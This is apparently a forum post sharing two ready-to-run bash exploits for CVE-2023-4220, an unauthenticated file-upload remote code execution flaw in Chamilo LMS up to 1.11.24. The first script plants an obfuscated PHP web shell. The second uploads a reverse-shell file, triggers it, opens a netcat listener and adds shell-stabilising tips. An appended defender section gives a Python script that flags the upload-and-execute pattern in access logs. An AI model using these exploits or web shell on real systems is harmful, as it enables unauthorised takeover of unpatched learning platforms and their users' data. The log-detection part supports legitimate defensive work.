
Web File upload (RCE), Chamilo LMS, CVE-2023-4220

blackhunt

Chamilo LMS <= 1.11.24 (Beersel 31/08/2023)
Unauthenticated Big Upload File Remote Code Execution

Identify version: /documentation/changelog.html

POC EXPLOIT CVE RCE VULN

Bash:
#!/bin/bash
URL='http://lms.domain.com'
CMD='id'

PATH_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
PATH_FILE='main/inc/lib/javascript/bigupload/files/rce.php'

cat <<'EOF'>/tmp/rce.php
<?php
$a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a);
?>
EOF

curl -F 'bigUploadFile=@/tmp/rce.php' "$URL/$PATH_UPLD"
CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")
curl "$URL/$PATH_FILE?aoOoy=$CMD"


Source: https://github.com/charlesgargasson/CVE-2023-4220

Chamilo-LMS-CVE-2023-4220 NEW Exploit

This is an exploit for unrestricted file upload in the big file upload functionality of Chamilo LMS, at /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24. Attackers can obtain remote code execution by uploading a web shell: the flaw allows arbitrary files to be uploaded to the /main/inc/lib/javascript/bigupload/files directory.


Vulnerability POC

- You can first run the exploit without arguments to see how to use it, like this:


Bash:
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh

- Then you need to enter the required inputs, like this:

Bash:
~$ ./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file



- Here we can find the uploaded file on the server:

Code:
http://target.test/main/inc/lib/javascript/bigupload/files/


Bash:
#!/bin/bash
# Exploit Title : Chamilo LMS CVE-2023-4220 Exploit
# Date : 11/28/2023
# Exploit Author : Ziad Sakr (@Ziad-Sakr)
# Version : ≤v1.11.24
# CVE : 2023-4220
# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2023-4220
#
# Description :
#   This is an exploit for unrestricted file upload in the big file upload functionality of Chamilo LMS, at
#   "/main/inc/lib/javascript/bigupload/inc/bigUpload.php" in Chamilo LMS <= v1.11.24; attackers can
#   obtain remote code execution by uploading a web shell.
#
# Usage:  ./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file

# Initialize variables with default values
reverse_file=""
host_link=""
port=""

#------------------------------------------------

RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'


# Usage function to display script usage
usage() {
    echo -e "${GREEN}"
    echo "Usage: $0 -f reverse_file -h host_link -p port_in_the_reverse_file"
    echo -e "${NC}"
    echo "Options:"
    echo "  -f    Path to the reverse file"
    echo "  -h    Host link where the file will be uploaded"
    echo "  -p    Port for the reverse shell"
    exit 1
}

# Parse command-line options
while getopts "f:h:p:" opt; do
    case $opt in
        f)
            reverse_file=$OPTARG
            ;;
        h)
            host_link=$OPTARG
            ;;
        p)
            port=$OPTARG
            ;;
        \?)
            echo -e "${RED}"
            echo "Invalid option: -$OPTARG" >&2
            usage
            ;;
        :)
            echo -e "${RED}"
            echo "Option -$OPTARG requires an argument." >&2
            usage
            ;;
    esac
done

# Check if all required options are provided
if [ -z "$reverse_file" ] || [ -z "$host_link" ] || [ -z "$port" ]; then
    echo -e "${RED}"
    echo "All options -f, -h, and -p are required."
    usage
fi
# Perform the file upload using curl
echo -e "${GREEN}"
curl -F "bigUploadFile=@$reverse_file" "$host_link/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
echo
echo
echo -e "#    Use this later for an interactive TTY ;) " "${RED}"
echo "#    python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"
echo "#    export TERM=xterm"
echo "#    CTRL + Z"
echo "#    stty raw -echo; fg"
echo -e "${GREEN}"
echo "# Starting Reverse Shell On Port $port . . . . . . ."
sleep 3
curl "$host_link/main/inc/lib/javascript/bigupload/files/$reverse_file" &
echo -e "${NC}"

nc -lnvp $port


Source: https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit
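Defender-side addition (not part of the post above and not code from either linked repository): both exploits leave the same two traces in the web server access log, an unauthenticated POST to bigUpload.php with action=post-unsupported, followed by a request for a PHP file under bigupload/files/. The script below parses combined-format access log lines and correlates those two stages per client IP. The endpoint and directory paths are the ones quoted in the post; the log lines, IPs and timestamps are constructed for this example. Patching the LMS is the fix; this only shows what to hunt for in logs from the exposure window.

```python
"""Flag CVE-2023-4220 (Chamilo LMS bigupload) exploitation attempts in access logs.

Added example: paths come from the post, all log lines are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Endpoint and upload directory named in the post.
UPLOAD_ENDPOINT = "/main/inc/lib/javascript/bigupload/inc/bigUpload.php"
UPLOAD_DIR = "/main/inc/lib/javascript/bigupload/files/"
# Extensions a typical PHP web server hands to the interpreter.
SCRIPT_EXTENSIONS = (".php", ".phtml", ".phar", ".php5", ".php7")

# Apache/nginx combined log format: ip ident user [ts] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one full upload+execute chain from 203.0.113.7, a lone
# probe from 198.51.100.9 and benign traffic from 192.0.2.10.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jul/2024:12:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jul/2024:12:00:01 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 17',
    '203.0.113.7 - - [10/Jul/2024:12:00:04 +0000] "GET /main/inc/lib/javascript/bigupload/files/rce.php?aoOoy=aWQK HTTP/1.1" 200 58',
    '192.0.2.10 - - [10/Jul/2024:12:00:05 +0000] "GET /main/inc/lib/javascript/bigupload/files/lecture.pdf HTTP/1.1" 200 90210',
    '198.51.100.9 - - [10/Jul/2024:12:00:09 +0000] "GET /main/inc/lib/javascript/bigupload/files/x.phtml HTTP/1.1" 404 196',
    "not a log line at all",
]


def classify(line):
    """Return ("upload"|"exec", ip, target) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path, query = parts.path, parse_qs(parts.query)
    # Stage 1: the unauthenticated upload request itself.
    if (m.group("method") == "POST" and path == UPLOAD_ENDPOINT
            and "post-unsupported" in query.get("action", [])):
        return ("upload", m.group("ip"), m.group("target"))
    # Stage 2: a script being fetched (executed) from the upload directory.
    if path.startswith(UPLOAD_DIR) and path.lower().endswith(SCRIPT_EXTENSIONS):
        return ("exec", m.group("ip"), m.group("target"))
    return None


def correlate(lines):
    """Group findings per client IP; an IP seen in both stages is the strongest signal."""
    by_ip = defaultdict(lambda: {"upload": [], "exec": []})
    for line in lines:
        hit = classify(line)
        if hit:
            kind, ip, target = hit
            by_ip[ip][kind].append(target)
    return {ip: dict(v, confirmed=bool(v["upload"] and v["exec"]))
            for ip, v in by_ip.items()}


if __name__ == "__main__":
    for ip, info in correlate(SAMPLE_LOG).items():
        tag = "CONFIRMED" if info["confirmed"] else "suspicious"
        print(f"{ip}: {tag} upload={len(info['upload'])} exec={len(info['exec'])}")
```

Requests with a non-2xx status are still reported: a 404 on a script under files/ is a probe worth knowing about, and a 200 on an upload followed by a 200 on the script is the pattern to escalate. Feed `correlate()` the real log lines from the period the vulnerable version was exposed.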